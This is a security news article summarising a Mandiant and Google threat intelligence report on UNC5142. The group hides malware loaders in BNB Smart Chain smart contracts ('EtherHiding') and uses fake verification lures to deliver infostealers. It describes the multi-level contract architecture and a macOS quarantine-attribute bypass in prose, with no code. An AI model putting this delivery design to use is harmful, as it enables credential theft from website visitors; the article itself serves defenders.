Ddos 
UNC5142's EtherHiding architecture on the BNB Smart Chain | Image: Mandiant
A new joint analysis by Mandiant Threat Defense and Google Threat Intelligence Group (GTIG) has exposed a financially motivated threat cluster, tracked as UNC5142, which uses blockchain technology to conceal and distribute information-stealing malware. By embedding malicious code inside BNB Smart Chain smart contracts, the group leverages immutability and decentralization to evade takedowns and detection — marking one of the most technically advanced uses of blockchain infrastructure in modern cybercrime operations.
According to Mandiant and GTIG, “since late 2023, UNC5142 has significantly evolved their tactics, techniques, and procedures (TTPs) to enhance operational security and evade detection.” The cluster abuses a method known as EtherHiding, which “obscures malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain.”
Rather than serving malware from conventional servers, UNC5142 hides payloads inside smart contracts — self-executing blockchain scripts that are nearly impossible to remove once deployed. This approach enables the actor to weaponize legitimate Web3 infrastructure for long-term persistence, blending malicious traffic with normal blockchain activity.
“As of June 2025, GTIG had identified approximately 14,000 web pages containing injected JavaScript consistent with a UNC5142 compromised website.” These scripts are used to load CLEARSHORT, a JavaScript downloader that initiates the attack chain from vulnerable WordPress websites.
At the center of UNC5142’s infection chain is CLEARSHORT, a multistage downloader that retrieves malicious payloads from smart contracts. The first stage consists of injected JavaScript that connects to the BNB Smart Chain using Web3.js, fetches a secondary script from a blockchain-based contract, and finally displays a fake security prompt or “update” message to the victim.
Mandiant describes this process as a “multi-level smart contract system” where each contract plays a different operational role:
- First-level contracts act as routers pointing to the next contract address.
- Second-level contracts perform reconnaissance and victim fingerprinting.
- Third-level contracts host encrypted payload URLs and AES keys for final malware retrieval.
This proxy-style architecture is inspired by legitimate software engineering techniques, making the system both modular and adaptive. “By separating the static logic from the dynamic configuration, UNC5142 can rapidly rotate domains, update lures, and change decryption keys with a single, cheap transaction.”
Smart contracts offer unique advantages for cybercriminals. As the report explains, “storing malicious code within a smart contract makes it harder to detect with traditional web security tools that might scan website content directly.” Attackers also exploit “the ability to change stored data, such as a payload URL, without altering the permanent contract code.” This lets them update malicious infrastructure instantly while remaining operationally stable.
The operational cost is trivial: “A typical update, such as changing a lure URL or decryption key in the third-level contract, costs the actor between $0.25 and $1.50 USD in network fees.” That efficiency enables large-scale campaigns with minimal overhead.
UNC5142 has consistently refreshed its social engineering lures to appear legitimate.
- In early 2025, the group distributed fake reCAPTCHA and Data Privacy pages.
- By March 2025, they introduced a Cloudflare “Unusual Web Traffic” error page to prompt user interaction.
- In May 2025, they debuted an “Anti-Bot Verification” lure for Windows and macOS victims.
To host these pages, attackers abused Cloudflare Pages (*.pages.dev), leveraging the trust of Cloudflare’s infrastructure. The report notes:
“Cloudflare Pages is a legitimate service… these pages are less likely to be immediately blocked, and it is easy for the attackers to quickly create new pages if old ones are taken down.”
This blend of trusted hosting and blockchain-backed payload delivery makes UNC5142’s campaigns both highly resilient and difficult to dismantle.
Mandiant’s blockchain analysis revealed that UNC5142 operates two parallel infrastructures—referred to as Main and Secondary. Both are built on identical smart contract code and funded by wallets traced back to the OKX cryptocurrency exchange.
“The Main infrastructure stands out as the core campaign infrastructure… The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity.”
This mirrored deployment model reflects a deliberate effort to maintain redundancy against takedowns while managing separate sets of lures and payloads simultaneously.
UNC5142 acts as a malware distribution cluster, delivering popular information-stealing malware across platforms:
- VIDAR and LUMMAC.V2 for Windows
- RADTHIEF for credential theft
- ATOMIC for macOS systems
In February and April 2025, the group targeted macOS specifically with bash scripts designed to download ATOMIC via curl. These scripts executed /tmp/update payloads while removing Apple’s quarantine attribute to bypass security prompts — “a deliberate defense evasion technique designed to remove the com.apple.quarantine attribute.”
The report warns that “UNC5142 has demonstrated agility, flexibility, and an interest in adapting and evolving their operations.” Their ability to merge blockchain smart contracts, legitimate web services, and advanced JavaScript loaders signals a turning point for cybercriminal infrastructure.
Donate